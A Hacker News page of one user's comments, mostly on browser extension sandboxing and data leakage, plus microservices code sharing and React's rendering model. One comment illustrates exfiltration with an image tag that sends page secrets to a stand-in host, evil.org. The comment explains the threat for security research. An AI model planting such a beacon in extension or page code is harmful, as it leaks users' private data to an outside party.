Hacker Newsnew | comments | show | ask | jobs | submit | aboodman's comments login

It's a good idea, and one we thought of and tried to make work when I worked on extensions.

Unfortunately, the DOM itself is so flexible and powerful, that it can be used to exfiltrate information through a variety of mechanisms.

For example, that same extension that only has access to gmail.com's DOM? Well, it can add an image like <img src="evil.org?{secrets}">.

The extension system could try to detect such things, but there are a variety of ways for bad extensions to work around the detections.

-----


Very good points. We proposed a way to deal with DOM manipulation in the paper [1], but Stefan omitted this in the blog post. Specifically, Section 4 of the paper (the "Page access" paragraph) briefly describes this. (Sorry for referring you to the paper, but our wording in the paper is probably better than my attempt to paraphrase here.)

Of course there are other ways malicious extensions can used to leak data---pick your favorite covert channel. But the idea was to propose APIs (and mechanisms) that are not overtly leaky. (We are early in the process of actually building this though.)

[1] https://www.usenix.org/conference/hotos15/workshop-program/p...

-----


"To ensure that extensions cannot leak through the page’s DOM, we argue that extensions should instead write to a shadow-copy of the page DOM—any content loading as a result of modifying the shadow runs with the privilege of the extension and not the page. This ensures that the extension’s changes to the page are isolated from that of the page, while giving the appearance of a single layout" Could you elaborate more on this? Do you mean that you'll compare the network requests made from the main and the shadow pages? What if the main script is sensitive to the request receive time? Then the shadow DOM may act differently. From more practical standpoint, having two DOMs for every page will eat even more of my laptop's RAM.

-----


"Do you mean that you'll compare the network requests made from the main and the shadow pages?"

Essentially, yes. Requests from the extension should be treated as if they are of an origin different from the page. (We could potentially piggy-back on existing notions of security principals (e.g., that Firefox has) to avoid huge performance hits.) And if the extension is tainted the kinds of requests will be restricted according to the taint (as in COWL [1], likely using CSP for the underlying enforcement).

"What if the main script is sensitive to the request receive time? Then the shadow DOM may act differently."

If by main script you mean a script on the page, then there should be no real difference.

"From more practical standpoint, having two DOMs for every page will eat even more of my laptop's RAM."

I hope this won't be so bad down the line (assuming we'd be able to leverage some underlying shadow DOM infrastructure and that performs relatively well).

[1] http://cowl.ws

-----


Sorry for the slow reply.

I think part of what you are proposing Chrome already implements and calls "isolated worlds". Chrome extensions don't operate directly on the page's DOM, they have an isolated version of it (https://developer.chrome.com/extensions/content_scripts).

So in principal, we already have the context from which we can decide which network requests to allow or block (this is already used today to allow cross-origin XHR from content scripts).

However, it is super gnarly to implement your idea in practice because:

1. There has to be a connection traced from every network requests back to the JS context which ultimately caused the request (e.g., by mutating the DOM). This is doable, it's just a lot of work.

2. There can't be any way to execute JavaScript in the page - even with page's principal. Such mechanisms exist today by design because developers desire them.

3. Even if you do 1 and 2, there are still channels such as hyperlinks. The extension could add a hyperlink and get the user to click on it. I suppose you could try and tie that back to the script context that created or modified the hyperlink.

4. Even if you do 1-3, if you can induce the page script (or any other extension, or the browser, or the user) to request a URL of your design, you win.

Sigh. Still seems fun as a research project to see how close you could get.

-----


Yep, isolated worlds is definitely what we want, and part of the inspiration for the particular (DOM modification) feature we proposed.

I think CSP helps with 1 & 2, unless I'm missing something? (Our labels map down to CSP policies pretty naturally.)

Points 3-4 and phishing, in general, are definitely a concern. Unfortunately, I'm not sure that a great solution that does not get in way exists, but we'll see how close we can get :)

-----


CSP does help, but it is document-specific, not js-context specific. At least in Chrome, tracing the js context that was responsible for some network request would be significantly more difficult to implement.

-----


> avoid code sharing wherever possible

Err, wut? It sounds like you are saying that pretty much the one reliable guideline in the history of software has become a bad idea.

(I have come across places in my career where code sharing was not worthwhile, but they have been rare. And I frequently regretted the decision later.)

-----


if you are going to try and separate them out into services later, you need to have the code as compartmentalized as possible.

Otherwise when you eventually split them out, you will end up being in a situation where each service needs copies of all the files it required before.

This then is a situation where you will have to extract into a library, and make general enough to be used and versioned that way.

-----


People have been building multiple applications from a single codebase for a very long time. Put all the targets on a continuous build, add tests, and you're set.

The only sense in which versioning matters at all is that if the protocol the applications talk to each other over has to be versioned, and an application must understand the oldest version of the protocol they could potentially be spoken to over.

But things like Thrift and Protocol Buffers have this feature built in. You shouldn't need to version the actual code...

-----


the question is about building an application that is easier to split into microservices later.

it all comes down to this - http://www.infoq.com/news/2015/01/microservices-sharing-code

If you have multiple components that are depending on the same code, if you try to split them into multiple services that are being independently deployed, you need to keep the code they are depending on in sync.

So making a change to the code shared by multiple services, means you have to deploy multiple services for a single change.

I completely agree with you about the protobuf/thrift angle though. If you're in that situation, you are already doing it right.

-----


I think you are misunderstanding how this works. Google isn't "handling" any events at all, your webpage is. Google is instead the source of those events - it is simulating the role of a user.

So the bot loads your webpage into a headless browser and sends it a series of events to simulate a user interacting with it, and waits for navigation requests.

There is probably a whitelist of simulation behaviors:

  * mouseover, then click each <a> node
  * mouseover every pixel
  * mouseover, then change every <select> node
  * mouseover, then click every <button>
  etc...
Caveat: though I worked at Google when this work was being done, I was on a different team and don't have any inside knowledge - just speculating on an approach that would make sense.

-----


Did you watch the video? This project replaces everything about ui and layout within your app.

-----


It would be possible to generate basic API documentation from the IDL the browsers actually use internally. It would not necessarily be completely accurate because sometimes browsers don't use IDL for their features, but it would be another tool, and would have helped in this case.

You wouldn't need to even be a member of the browser team to do this, since the relevant data is all open source.

-----


"Component-based file structure. Handling styles, view hierarchy, and business logic all in one file is a step backwards. Poor style reusability is one direct consequence of this approach."

If only there was some way to pull out a hunk of code so that it could be reused. Hm. Somebody should invent that.

-----


Man, Facebook is just crushing it with the open source UI libraries recently.

-----


It depends on the browser.

In Chrome, extensions are sandboxed using similar technique as web pages are.

However, just because they are sandboxed doesn't mean they are safe. It just means they won't be able to get privileges beyond those explicitly granted to them.

Many extensions request very powerful privileges though, like the ability to read and write to web pages you visit. The browser will dutifully grant this privilege if the extension requests it and you allow it. It won't get the ability to run arbitrary native code though (unless it also requests that privilege).

-----


err, WebForms is the exact opposite. WebForms is about taking something stateless (HTML) and making is stateful. React takes something stateful (the DOM) and makes it stateless.

-----


That isn't declarative in the same way... that's markup. The kind of declarative that is used in React is more like functional programs. You write programs, using actual code, that compute ("declare") exactly what the UI should look like from top to bottom, given each possible input.

This is in contrast to a model where you mutate an existing UI model each time something interesting happens.

-----


Declarative is a vacuous word that means anything you want it to depending on context. We used to call functional programming "functional" and logic programming languages like Prolog "declarative." Then declarative started meaning markup, then declarative started meaning...immutable functional code? In PL, we mostly just avoid the word altogether these days since everyone has a different idea about what it means.

React is closer to an immediate-mode UI model: you write programs that compute exactly what the UI should look like on each frame, rather than mutating a scene graph each time something interesting happens (as occurs in retained-mode UI models). Substitute DOM for scene graph, and the distinction might hold.

But I'm not sure.

-----


I think that the reason people started calling React 'declarative' was because 'functional' was interpreted to mean (purely) functional, with no side effects.

But yes, exactly. React is similar to an immediate mode graphics API. Except that also has weird connotations, because people think of things like canvas that are very low-level: all you get are lines, arcs, and fills. React's primitives are at the same level of abstraction as the DOM, you just work with them in immediate mode, not retained mode.

-----


If I understand correctly, the DOM is retained, and React brings abstracts it efficiently back to a immediate mode API with some state retention, which has benefits since things stay consistent automatically.

In contrast, a UI model like WPF uses (declarative) data binding to achieve something similar, but without as much flexibility and with more verbosity.

I'm working on a system that allows for state retention in an immediate mode model, though wrapping WPF rather than HTML:

http://research.microsoft.com/en-us/people/smcdirm/managedti...

-----

More

Applications are open for YC Winter 2016

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | DMCA | Apply to YC | Contact

Search: